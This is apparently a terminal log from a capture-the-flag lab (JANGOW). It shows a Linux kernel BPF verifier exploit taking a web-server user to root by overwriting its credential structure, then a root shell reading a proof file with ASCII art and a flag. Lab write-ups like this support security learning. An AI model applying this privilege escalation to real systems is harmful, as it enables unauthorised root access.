[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88003a782d00
[*] Leaking sock struct from ffff880039ff7680
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880039444900
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff880039444900
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
Get shell
# pwd
pwd
/var/www/html/site
# cd /root
cd /root
# ls
ls
proof.txt
# cat proof.txt
cat proof.txt
@@@&&&&&&&&&&&&&&&&&&&@@@@@@@@@@@@@@@&&&&&&&&&&&&&&
@ @@@@@@@@@@@@@@@&# #@@@@@@@@&(. /&@@@@@@@@@@
@ @@@@@@@@@@&( .@@@@@@@@&%####((//#&@@@& .&@@@@@
@ @@@@@@@& @@@@@@&@@@@@&%######%&@* ./@@* &@@
@ @@@@@* (@@@@@@@@@#/. .*@. .#&. &@@@&&
@ @@@, /@@@@@@@@#, .@. ,&, @@&&
@ @& @@@@@@@@#. @@@,@@@/ %. #, %@&
@@@# @@@@@@@@/ .@@@@@@@@@@ * ., @@
@@& @@@@@@@@* @@@@@@@@@@@ , @
@& .@@@@@@@( @@@@@@@@@@@@@@@@@@@@@ *. &@
@@/ *@@@@@@@/ @@@@@@@@@@@# @@
@@ .@@@@@@@/ @@@@@@@@@@@@@ @# @@
@@ @@@@@@@@. @@@@@@@@@@@ @@( @@
@& .@@@@@@@@. , @@@@@@@ * .@@@*( .@
@@ ,@@@@@@@@, @@@@@@@@@&*%@@@@@@@@@, @@@@@(%&* &@
@@& @@@@@@@@@@@@@@@@@ (@@@@@@@@@@@@@@%@@/ &@
@ @& ,@@@@@@@@@@@@@@@,@@@@@@@&%@@@@@@@@@@@@@@@%* &@
@ @@. .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%* &@&
@ @@@& ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%/ &@@&&
@ @@@@@@. *%@@@@@@@@@@@@@@@@@@@@&#/. &@@@@&&
@ @@@@@@@@& JANGOW &@@@
@ &&&&&&&&&@@@& @@(&@ @. %.@ @@%@ &@@@&&&&
&&&@@@@&% &/ (&&@@@&&&
(((((((((((((((((((((((((((((
da39a3ee5e6b4b0d3255bfef95601890afd80709 (second flag)